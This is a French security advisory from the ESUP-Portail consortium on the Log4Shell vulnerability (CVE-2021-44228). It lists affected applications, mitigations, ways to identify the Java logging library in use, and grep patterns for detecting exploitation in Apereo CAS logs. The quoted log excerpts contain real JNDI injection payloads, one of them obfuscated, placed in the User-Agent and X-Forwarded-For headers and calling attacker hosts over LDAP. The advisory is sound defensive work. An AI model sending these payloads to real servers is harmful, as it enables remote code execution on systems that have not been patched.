Les avis de sécurité du consortium ESUP-Portail portent sur des vulnérabilités des logiciels diffusés par le consortium. Il est de la responsabilité de chacun des destinataires de ce document de ne pas le rediffuser en dehors du cadre pour lequel il a été écrit, pour des raisons évidentes de sécurité des Systèmes d'Information de tous les établissements du consortium ESUP-Portail.
Objet | Log4shell - CVE-2021-44228 vis à vis des applications ESUP |
Référence | ESUP-2021-AVI-001 |
Date de la première version | 12 décembre 2021 |
Date de la dernière version | 16 décembre 2021 |
Source | CVE-2021-44228 |
Diffusion de cette version | Publique |
Historique |
|
Planning prévisionnel | - |
Pièces jointes | - |
La faille concerne toutes les versions de log4j 2.x. Elle est corrigée dans la version 2.15.0.
Exemple (simple) avec un serveur Apereo CAS vulnérable (dans les conditions d'exploitation les plus défavorables).
technique "zip" : supprimer la classe du jar
zip -q -d log4j-core*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class |
NB : si vous lancez la commande en root, le jar appartiendra ensuite à root.
technique "configurer" : si log4j-core ≥ 2.10, ajouter ceci à la ligne de commande java
-Dlog4j2.formatMsgNoLookups=true |
NB : il faut redémarrer le service pour appliquer la modification (sauf pour la technique "firewall")
6.3.7.2
.ou >= 6.4.4 : versions des branches 6.3 et 6.4 (les seules maintenues ; les autres sont considérées comme obsolètes) corrigéesesup-smsu (log4j ; toutes versions)
esupUserApps / ProlongationENT (log4j ; toutes versions)
Voir cette liste de liens vers les annonces des éditeurs
Pour déterminer si une application java est impactée il faut déterminer quelle librairie de log est utilisée.
En java, 3 librairies (implémentations) de logs sont principalement utilisées : log4j, log4j2 et logback.
log4j est la librairie historique : elle est encore très utilisée. log4j est un projet distinct de log4j2
On peut trouver d'anciennes librairies telles que commons-logging qui offrent une couche d'abstraction à log4j.
log4j tend à être remplacée par log4j2 ou logback.
slf4j peut être utilisée comme API (couche d'abstraction) au dessus de ces librairies ; pour le développeur cela permet théoriquement de changer d'implémentation rapidement (passer de log4j2 à logback par exemple).
En tant qu'exploitant vous pouvez retrouver ces librairies sous forme de jar. Au niveau des sources, on retrouve leurs références généralement dans des fichiers pom.xml (maven) ou build.gradle (gradle) ; avec le jeu des dépendances, la référence peut cependant ne pas être explicite.
Vous pouvez aussi +/- retrouver l'implémentation de librairie de logs utilisée suivant les configurations de ces logs ; même si il peut y avoir des variantes, adaptation du développeur, configurations implicites ... :
Par défaut spring-boot propose l'usage de logback (le développeur peut bien sûr choisir d'utiliser une autre librairie, cf Apereo CAS).
Exemple avec un serveur Apereo CAS
Lors d'une tentative d'authentification, Apereo CAS peut loguer avec log4j-2 le username, l'"adresse ip" (entête http x-forwarded-for lorsqu'on se place derrière un proxy), le user-agent (entête http également qui peut être forgée) ...
Vous pouvez rechercher '${' ou 'Reference Class' ou encore 'javax.el.ELProcessor@' pour voir si une tentative d'exploitation de la faille a été opérée.
Exemple :
grep -e '${' -e 'Reference Class' -e 'javax.el.ELProcessor' /opt/tomcat-cas/logs/cas.log 2021-12-11 05:48:59,478 WARN [org.apereo.cas.web.flow.SpnegoNegotiateCredentialsAction] - <User Agent header [${jndi:${lower:l}${lower:d}a${lower:p}://toto.log4j2${upper:a}attaq.io:80/callback}] is not supported in the list of supported browsers [[Firefox]]> |
grep -e '${' -e 'Reference Class' -e 'javax.el.ELProcessor' /opt/tomcat-cas/logs/cas_audit.log CLIENT IP ADDRESS: ${jndi:ldap://X-Forwarded-For.univ-ville.fr.id-de-test.solution-de-test.net/a.bc} WHO: ${jndi:ldap://hack.me:1389//univ-ville.fr/X-Forwarded-For} CLIENT IP ADDRESS: Reference Class Name: foo |
Dans tous les cas une analyse plus poussée (flux) est à envisager. La prudence reste de mise. L'exécution d'un code arbitraire pouvant altérer l'ensemble du système, dont les journaux eux-mêmes.
CAS Log4J Vulnerability Disclosure : https://apereo.github.io/2021/12/11/log4j-vuln/